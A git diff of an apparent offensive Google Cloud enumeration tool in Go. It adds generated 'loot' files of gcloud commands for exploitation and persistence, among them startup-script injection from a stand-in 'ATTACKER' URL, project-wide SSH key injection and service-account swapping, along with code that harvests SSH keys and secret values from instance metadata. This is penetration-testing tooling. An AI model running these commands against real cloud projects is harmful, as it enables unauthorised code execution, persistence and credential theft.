+ + // Log sensitive metadata findings + if projectMeta != nil && len(projectMeta.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in project %s metadata", len(projectMeta.SensitiveMetadata), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + for _, inst := range instances { + if len(inst.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in instance %s", len(inst.SensitiveMetadata), inst.Name), globals.GCP_INSTANCES_MODULE_NAME) + } + } m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -207,11 +223,40 @@ func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *Compu lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# PROJECT-LEVEL COMMANDS (Project: %s)\n"+ - "# ==========================================\n"+ - "\n# Get project metadata:\n"+ - "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", - meta.ProjectID, meta.ProjectID, + "# ==========================================\n\n", + meta.ProjectID, + ) + + // --- PROJECT ENUMERATION --- + lootFile.Contents += "# --- PROJECT ENUMERATION ---\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n"+ + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items)'\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, ) + + // Add commands for specific project metadata keys + for key := range meta.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items.filter(key:%s).extract(value).flatten())'\n", + meta.ProjectID, key, + ) + } + + // --- PROJECT-LEVEL EXPLOITATION --- + lootFile.Contents += "\n# --- PROJECT-LEVEL EXPLOITATION ---\n" + lootFile.Contents += fmt.Sprintf( + "# Add project-wide SSH key (applies to all instances not blocking project keys)\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n"+ + "# Add project-wide startup script\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Enable OS Login project-wide\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=enable-oslogin=TRUE\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, + ) + + lootFile.Contents += "\n" } // addProjectMetadataFullToLoot adds full project metadata to the metadata loot file @@ -260,44 +305,124 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# INSTANCE: %s (Zone: %s)\n"+ - "# ==========================================\n", + "# ==========================================\n\n", instance.Name, instance.Zone, ) - // Commands section only + // --- ENUMERATION --- + lootFile.Contents += "# --- ENUMERATION ---\n" lootFile.Contents += fmt.Sprintf( - "# Describe instance:\n"+ - "gcloud compute instances describe %s --zone=%s --project=%s\n"+ - "# Get IAM policy:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ - "# Get serial port output:\n"+ "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n", instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, ) - // SSH commands + // --- METADATA ENUMERATION --- + lootFile.Contents += "\n# --- METADATA ENUMERATION ---\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items)'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Add commands for specific metadata keys found + for key := range instance.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items.filter(key:%s).extract(value).flatten())'\n", + instance.Name, instance.Zone, instance.ProjectID, key, + ) + } + + // --- CODE EXECUTION / ACCESS --- + lootFile.Contents += "\n# --- CODE EXECUTION / ACCESS ---\n" + + // SSH with external IP if instance.ExternalIP != "" { lootFile.Contents += fmt.Sprintf( - "# SSH (external IP):\n"+ - "gcloud compute ssh %s --zone=%s --project=%s\n", + "# SSH (external IP available)\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, ) - } else { + } + + // SSH via IAP tunnel (always an option) + lootFile.Contents += fmt.Sprintf( + "# SSH via IAP tunnel\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // OS Login (if enabled) + if instance.OSLoginEnabled { lootFile.Contents += fmt.Sprintf( - "# SSH via IAP tunnel (no external IP):\n"+ - "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n", + "# OS Login (enabled on this instance)\n"+ + "gcloud compute os-login ssh-keys add --key-file=~/.ssh/id_rsa.pub\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n", instance.Name, instance.Zone, instance.ProjectID, ) } - // Exploitation commands + // Serial console + lootFile.Contents += fmt.Sprintf( + "# Serial console access\n"+ + "gcloud compute connect-to-serial-port %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SCP file transfer + lootFile.Contents += fmt.Sprintf( + "# SCP file transfer\n"+ + "gcloud compute scp LOCAL_FILE %s:REMOTE_PATH --zone=%s --project=%s\n"+ + "gcloud compute scp %s:REMOTE_PATH LOCAL_FILE --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // --- EXPLOITATION / PERSISTENCE --- + lootFile.Contents += "\n# --- EXPLOITATION / PERSISTENCE ---\n" + + // Startup script injection lootFile.Contents += fmt.Sprintf( - "# Add startup script (persistence):\n"+ - "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n\n", + "# Add startup script (runs on next boot)\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Add startup script from URL\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script-url=http://ATTACKER/script.sh\n", + instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, ) + + // SSH key injection + lootFile.Contents += fmt.Sprintf( + "# Inject SSH key via metadata\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Reset instance (to trigger startup script) + lootFile.Contents += fmt.Sprintf( + "# Reset instance (triggers startup script)\n"+ + "gcloud compute instances reset %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Set service account + lootFile.Contents += fmt.Sprintf( + "# Change service account (requires stop first)\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n"+ + "gcloud compute instances set-service-account %s --zone=%s --project=%s --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com --scopes=cloud-platform\n"+ + "gcloud compute instances start %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n" } // addInstanceMetadataToLoot adds full instance metadata to the metadata loot file @@ -341,6 +466,53 @@ func (m *InstancesModule) addInstanceMetadataToLoot(projectID string, instance C } } +// addInstanceSSHKeysToLoot adds instance SSH keys to the SSH keys loot file +func (m *InstancesModule) addInstanceSSHKeysToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + if len(instance.SSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "================================================================================\n"+ + "INSTANCE: %s (Zone: %s)\n"+ + "================================================================================\n", + instance.Name, instance.Zone, + ) + + for _, key := range instance.SSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + +// addProjectSSHKeysToLoot adds project-level SSH keys to the SSH keys loot file +func (m *InstancesModule) addProjectSSHKeysToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil || len(meta.ProjectSSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "================================================================================\n"+ + "PROJECT-LEVEL SSH KEYS (apply to all instances not blocking project keys)\n"+ + "================================================================================\n", + ) + + for _, key := range meta.ProjectSSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + // ------------------------------ // Output Generation // ------------------------------ @@ -357,6 +529,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := m.getInstancesTableHeader() sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() // Build hierarchical output data outputData := internal.HierarchicalOutputData{ @@ -383,6 +556,16 @@ func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger in }) } + // Build SSH keys table for this project + sshKeysBody := m.buildSSHKeysTableForProject(projectID, instances) + if len(sshKeysBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + // Collect loot for this project var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { @@ -418,14 +601,18 @@ func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger in func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := m.getInstancesTableHeader() sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() allInstances := m.getAllInstances() body := m.instancesToTableBody(allInstances) // Build sensitive metadata table for all projects var sensitiveBody [][]string + // Build SSH keys table for all projects + var sshKeysBody [][]string for projectID, instances := range m.ProjectInstances { sensitiveBody = append(sensitiveBody, m.buildSensitiveMetadataTableForProject(projectID, instances)...) + sshKeysBody = append(sshKeysBody, m.buildSSHKeysTableForProject(projectID, instances)...) } // Collect all loot files @@ -454,6 +641,15 @@ func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.L }) } + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + output := InstancesOutput{ Table: tableFiles, Loot: lootFiles, @@ -521,13 +717,76 @@ func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { "Project Name", "Project ID", "Source", - "Instance/Zone", - "Key", + "Zone", + "Metadata Key", + "Variable", "Type", "Value", } } +// getSSHKeysTableHeader returns the SSH keys table header +func (m *InstancesModule) getSSHKeysTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Source", + "Zone", + "SSH Key", + } +} + +// buildSSHKeysTableForProject builds the SSH keys table body for a specific project +func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + + // Add project-level SSH keys + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + body = append(body, []string{ + m.GetProjectName(projectID), + projectID, + "PROJECT", + "-", + truncateSSHKeyMiddle(key, 100), + }) + } + } + + // Add instance-level SSH keys + for _, instance := range instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Zone, + truncateSSHKeyMiddle(key, 100), + }) + } + } + } + + return body +} + +// truncateSSHKeyMiddle truncates an SSH key in the middle, preserving start and end for searchability +// Format: "user:ssh-rsa AAAA...xyz comment" -> "user:ssh-rsa AAAA...xyz comment" +func truncateSSHKeyMiddle(key string, maxLen int) string { + if len(key) <= maxLen { + return key + } + // Keep more at the start (user and key type) and end (comment) + startLen := maxLen * 2 / 3 // ~66% at start + endLen := maxLen - startLen - 5 // 5 for " ... " + if endLen < 10 { + endLen = 10 + startLen = maxLen - endLen - 5 + } + return key[:startLen] + " ... " + key[len(key)-endLen:] +} + // instancesToTableBody converts instances to table body rows func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService.ComputeEngineInfo) [][]string { var body [][]string @@ -630,6 +889,7 @@ func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string projectID, "PROJECT", "-", + item.MetadataKey, item.Key, item.Type, item.Value, @@ -646,6 +906,7 @@ func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string instance.ProjectID, instance.Name, instance.Zone, + item.MetadataKey, item.Key, item.Type, item.Value, diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index a943eab5..7ab818a3 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -332,8 +332,8 @@ type SensitiveItem struct { Key string `json:"key"` Value string `json:"value"` Type string `json:"type"` // password, api-key, token, credential, connection-string, secret, env-var - Source string `json:"source"` // instance or project - Truncated bool `json:"truncated"` // Whether value was truncated for display + Source string `json:"source"` // instance, project, or specific like "instance:user-data" + MetadataKey string `json:"metadataKey"` // The metadata key where this was found (e.g., user-data, startup-script) } // MetadataParseResult contains all parsed metadata fields @@ -360,39 +360,54 @@ func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, bl } // sensitivePatterns maps key name patterns to secret types +// These are checked with contains matching, so they should be specific enough to avoid false positives var sensitivePatterns = map[string]string{ - "PASSWORD": "password", - "PASSWD": "password", - "SECRET": "secret", - "API_KEY": "api-key", - "APIKEY": "api-key", - "API-KEY": "api-key", - "TOKEN": "token", - "ACCESS_TOKEN": "token", - "AUTH_TOKEN": "token", - "BEARER": "token", - "CREDENTIAL": "credential", - "PRIVATE_KEY": "credential", - "PRIVATEKEY": "credential", + // Passwords - high confidence patterns that end with PASSWORD/PASSWD/PWD + "_PASSWORD": "password", + "_PASSWD": "password", + "_PWD": "password", + "_PASS": "password", + + // Secrets - patterns that explicitly contain SECRET + "_SECRET": "secret", + "SECRET_KEY": "secret", + "APP_SECRET": "secret", + "JWT_SECRET": "secret", + + // API Keys - explicit API key patterns + "API_KEY": "api-key", + "APIKEY": "api-key", + "_APIKEY": "api-key", + "API_SECRET": "api-key", + + // Tokens - explicit token patterns (must have _TOKEN suffix or TOKEN_ prefix to be specific) + "_TOKEN": "token", + "TOKEN_": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER_": "token", + + // Private keys + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "_PRIVKEY": "credential", + + // Connection strings - explicit patterns "CONNECTION_STRING": "connection-string", - "CONN_STR": "connection-string", "DATABASE_URL": "connection-string", - "DB_PASSWORD": "password", - "DB_PASS": "password", - "MYSQL_PASSWORD": "password", - "POSTGRES_PASSWORD": "password", - "REDIS_PASSWORD": "password", "MONGODB_URI": "connection-string", - "AWS_ACCESS_KEY": "credential", - "AWS_SECRET": "credential", - "AZURE_KEY": "credential", - "GCP_KEY": "credential", - "ENCRYPTION_KEY": "credential", - "SIGNING_KEY": "credential", - "JWT_SECRET": "credential", - "SESSION_SECRET": "credential", - "OAUTH": "credential", - "CLIENT_SECRET": "credential", + "_CONN_STR": "connection-string", + + // Cloud provider credentials - very specific patterns + "AWS_SECRET_ACCESS_KEY": "credential", + "AWS_SESSION_TOKEN": "credential", + "AZURE_CLIENT_SECRET": "credential", + "GOOGLE_CREDENTIALS": "credential", + + // OAuth - specific patterns + "CLIENT_SECRET": "credential", + "CONSUMER_SECRET": "credential", + "OAUTH_SECRET": "credential", } // detectSensitiveType checks if a key name matches sensitive patterns @@ -434,17 +449,32 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { continue } - // Store all raw metadata - if item.Value != nil { + // Store all raw metadata (except ssh-keys which go to separate loot) + if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" { result.RawMetadata[item.Key] = *item.Value } + // Check ALL metadata keys for sensitive patterns (not just custom ones) + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + result.SensitiveItems = append(result.SensitiveItems, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + MetadataKey: item.Key, // The key itself is the metadata key + }) + } + // Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns) + valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key) + result.SensitiveItems = append(result.SensitiveItems, valueItems...) + } + switch item.Key { case "startup-script": result.HasStartupScript = true if item.Value != nil { result.StartupScriptContent = *item.Value - // Check startup script for sensitive patterns + // Check startup script for sensitive patterns (env vars inside script) sensitiveItems := extractSensitiveFromScript(*item.Value, "startup-script") result.SensitiveItems = append(result.SensitiveItems, sensitiveItems...) } @@ -482,20 +512,9 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { result.SerialPortEnabled = true } default: - // Track custom metadata keys (may contain secrets) + // Track custom metadata keys if !knownKeys[item.Key] { result.CustomMetadata = append(result.CustomMetadata, item.Key) - - // Check if key name suggests sensitive content - if item.Value != nil { - if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { - result.SensitiveItems = append(result.SensitiveItems, SensitiveItem{ - Key: item.Key, - Value: *item.Value, - Type: sensitiveType, - }) - } - } } } } @@ -503,37 +522,119 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { return result } -// extractSensitiveFromScript extracts potential sensitive values from scripts -func extractSensitiveFromScript(script, source string) []SensitiveItem { +// extractSensitiveFromScript scans content for sensitive variable assignments +// Focuses on explicit VAR=value patterns to minimize false positives +// source format: "metadata-value:KEY_NAME" or "startup-script" or "project-startup-script" +func extractSensitiveFromScript(content, source string) []SensitiveItem { var items []SensitiveItem - lines := strings.Split(script, "\n") + seen := make(map[string]bool) // Deduplicate findings + + // Parse the metadata key from the source + metadataKey := source + if strings.HasPrefix(source, "metadata-value:") { + metadataKey = strings.TrimPrefix(source, "metadata-value:") + } + + lines := strings.Split(content, "\n") for _, line := range lines { line = strings.TrimSpace(line) - // Skip comments and empty lines + + // Skip empty lines and comments if line == "" || strings.HasPrefix(line, "#") { continue } - // Look for export VAR=value or VAR=value patterns + // Pattern 1: Shell style - export VAR=value or VAR=value if strings.Contains(line, "=") { - // Handle export statements - line = strings.TrimPrefix(line, "export ") + // Handle export statements and YAML list items + testLine := strings.TrimPrefix(line, "export ") + testLine = strings.TrimPrefix(testLine, "- ") + testLine = strings.TrimPrefix(testLine, "| ") + testLine = strings.TrimSpace(testLine) - parts := strings.SplitN(line, "=", 2) + parts := strings.SplitN(testLine, "=", 2) if len(parts) == 2 { key := strings.TrimSpace(parts[0]) value := strings.TrimSpace(parts[1]) // Remove quotes from value - value = strings.Trim(value, "\"'") - - if sensitiveType := detectSensitiveType(key); sensitiveType != "" && value != "" { - items = append(items, SensitiveItem{ - Key: key, - Value: value, - Type: sensitiveType, - Source: source, - }) + value = strings.Trim(value, "\"'`") + // Clean up key + key = strings.TrimLeft(key, "- |>") + key = strings.TrimSpace(key) + + // Only consider valid variable names with actual values + if isValidVarName(key) && len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } + } + } + + // Pattern 2: YAML style "key: value" - only for direct assignments + if strings.Contains(line, ": ") && !strings.HasPrefix(line, "#") && !strings.Contains(line, "=") { + parts := strings.SplitN(line, ": ", 2) + if len(parts) == 2 { + key := strings.TrimSpace(parts[0]) + value := strings.TrimSpace(parts[1]) + // Clean up key + key = strings.TrimLeft(key, "- ") + key = strings.TrimSpace(key) + // Remove quotes from value + value = strings.Trim(value, "\"'`") + + // Skip YAML block indicators and empty values + if value != "" && value != "|" && value != ">" && len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } + } + } + + // Pattern 3: JSON style "key": "value" + if strings.Contains(line, "\":") { + parts := strings.SplitN(line, "\":", 2) + if len(parts) == 2 { + keyPart := parts[0] + if idx := strings.LastIndex(keyPart, "\""); idx >= 0 { + key := keyPart[idx+1:] + value := strings.TrimSpace(parts[1]) + value = strings.Trim(value, " ,\"'`") + + if len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } } } } @@ -542,6 +643,47 @@ func extractSensitiveFromScript(script, source string) []SensitiveItem { return items } +// isPlaceholderValue checks if a value looks like a placeholder rather than a real secret +func isPlaceholderValue(value string) bool { + valueLower := strings.ToLower(value) + placeholders := []string{ + "xxx", "your_", "your-", "?/~`") { + return true + } + return false +} + +// isValidVarName checks if a string looks like a valid variable name +func isValidVarName(s string) bool { + if s == "" { + return false + } + // Variable names typically start with letter or underscore + first := s[0] + if !((first >= 'a' && first <= 'z') || (first >= 'A' && first <= 'Z') || first == '_') { + return false + } + // Rest can be alphanumeric or underscore + for _, c := range s[1:] { + if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_') { + return false + } + } + return true +} + // parseBootDiskEncryption checks the boot disk encryption type func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { encryptionType = "Google-managed" @@ -607,11 +749,30 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM continue } - // Store all raw metadata - if item.Value != nil { + // Store all raw metadata (except ssh-keys which go to separate loot) + if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" { info.RawMetadata[item.Key] = *item.Value } + // Check ALL metadata keys for sensitive patterns + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + info.SensitiveMetadata = append(info.SensitiveMetadata, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + Source: "project", + MetadataKey: item.Key, + }) + } + // Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns) + valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key) + for i := range valueItems { + valueItems[i].Source = "project" + } + info.SensitiveMetadata = append(info.SensitiveMetadata, valueItems...) + } + switch item.Key { case "ssh-keys", "sshKeys": info.HasProjectSSHKeys = true @@ -628,7 +789,7 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM info.HasProjectStartupScript = true if item.Value != nil { info.ProjectStartupScript = *item.Value - // Check startup script for sensitive patterns + // Check startup script for sensitive patterns (env vars inside script) sensitiveItems := extractSensitiveFromScript(*item.Value, "project-startup-script") for i := range sensitiveItems { sensitiveItems[i].Source = "project" @@ -648,21 +809,9 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM info.SerialPortEnabled = true } default: - // Track other custom metadata that might contain secrets + // Track other custom metadata keys if !isKnownMetadataKey(item.Key) { info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) - - // Check if key name suggests sensitive content - if item.Value != nil { - if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { - info.SensitiveMetadata = append(info.SensitiveMetadata, SensitiveItem{ - Key: item.Key, - Value: *item.Value, - Type: sensitiveType, - Source: "project", - }) - } - } } } } From cb8be678e74c0472865b356bac29897e6f58a8d4 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Sun, 15 Feb 2026 23:02:27 -0500 Subject: [PATCH 37/48] removed attack paths to use foxmapper instead --- cli/gcp.go | 182 +- gcp/commands/appengine.go | 10 +- gcp/commands/bucketenum.go | 9 +- gcp/commands/buckets.go | 106 +- gcp/commands/cloudbuild.go | 10 +- gcp/commands/cloudrun.go | 37 +- gcp/commands/composer.go | 10 +- gcp/commands/crossproject.go | 64 +- gcp/commands/dataexfiltration.go | 597 +--- gcp/commands/dataflow.go | 16 +- gcp/commands/dataproc.go | 10 +- gcp/commands/foxmapper.go | 865 +++++ gcp/commands/functions.go | 27 +- gcp/commands/gke.go | 27 +- gcp/commands/hiddenadmins.go | 212 +- gcp/commands/iam.go | 43 +- gcp/commands/instances.go | 145 +- gcp/commands/inventory.go | 279 +- gcp/commands/lateralmovement.go | 756 ++--- gcp/commands/notebooks.go | 14 +- gcp/commands/privesc.go | 679 ++-- gcp/commands/scheduler.go | 10 +- gcp/commands/secrets.go | 35 +- gcp/commands/serviceaccounts.go | 105 +- gcp/commands/serviceagents.go | 20 +- gcp/commands/whoami.go | 837 +++-- gcp/commands/workloadidentity.go | 35 +- .../attackpathService/attackpathService.go | 2930 ----------------- .../bucketEnumService/bucketEnumService.go | 28 + .../computeEngineService.go | 170 +- .../foxmapperService/foxmapperService.go | 1659 ++++++++++ gcp/services/iamService/iamService.go | 121 +- go.mod | 1 - internal/gcp/attackpath_cache.go | 545 --- internal/gcp/foxmapper_cache.go | 275 ++ internal/gcp/persistent_cache.go | 142 +- internal/gcp/privesc_cache.go | 18 - 37 files changed, 5175 insertions(+), 5854 deletions(-) create mode 100644 gcp/commands/foxmapper.go delete mode 100644 gcp/services/attackpathService/attackpathService.go create mode 100644 gcp/services/foxmapperService/foxmapperService.go delete mode 100644 internal/gcp/attackpath_cache.go create mode 100644 internal/gcp/foxmapper_cache.go delete mode 100644 internal/gcp/privesc_cache.go diff --git a/cli/gcp.go b/cli/gcp.go index 71d87198..0a62a96f 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -7,7 +7,6 @@ import ( "time" "github.com/BishopFox/cloudfox/gcp/commands" - attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" @@ -126,15 +125,29 @@ var ( // Get account for cache operations account, _ := ctx.Value("account").(string) - // If --attack-paths flag is set, load or run attack path analysis + // If --attack-paths flag is set, try to load FoxMapper data // This allows individual modules to show the Attack Paths column if GCPAttackPaths && len(GCPProjectIDs) > 0 { - GCPLogger.InfoM("Loading/running attack path analysis (privesc/exfil/lateral)...", "gcp") - attackPathCache := loadOrRunAttackPathAnalysis(ctx, GCPRefreshCache) - if attackPathCache != nil && attackPathCache.IsPopulated() { - ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) - privesc, exfil, lateral := attackPathCache.GetStats() - GCPLogger.SuccessM(fmt.Sprintf("Attack path cache ready: %d privesc, %d exfil, %d lateral - modules will show Attack Paths column", privesc, exfil, lateral), "gcp") + GCPLogger.InfoM("Looking for FoxMapper graph data...", "gcp") + + // Get org ID from hierarchy if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if hierarchy, ok := ctx.Value("hierarchy").(*gcpinternal.ScopeHierarchy); ok && hierarchy != nil { + if len(hierarchy.Organizations) > 0 { + orgID = hierarchy.Organizations[0].ID + } + } + } + + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc - modules will show Attack Paths column", + totalNodes, adminNodes, nodesWithPrivesc), "gcp") + } else { + GCPLogger.InfoM("No FoxMapper data found. Run 'foxmapper gcp graph create' to generate graph data for attack path analysis.", "gcp") } } @@ -258,27 +271,35 @@ var GCPAllChecksCommand = &cobra.Command{ } } - // Run privesc command first (produces output) and populate cache for other modules + // Run privesc command first (produces output) and load FoxMapper data for other modules if privescCmd != nil { GCPLogger.InfoM("Running privilege escalation analysis first...", "all-checks") privescCmd.Run(cmd, args) executedModules = append(executedModules, "privesc") - // After running privesc, load or populate attack path cache for other modules - // BUT only if cache wasn't already populated by --attack-paths flag in PersistentPreRun - existingCache := gcpinternal.GetAttackPathCacheFromContext(ctx) - if existingCache != nil && existingCache.IsPopulated() { - // Cache already populated by --attack-paths flag, reuse it - privesc, exfil, lateral := existingCache.GetStats() - GCPLogger.InfoM(fmt.Sprintf("Using existing attack path cache: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") + // After running privesc, try to load FoxMapper data for other modules + existingFoxMapper := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if existingFoxMapper != nil && existingFoxMapper.IsPopulated() { + totalNodes, adminNodes, nodesWithPrivesc := existingFoxMapper.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing FoxMapper 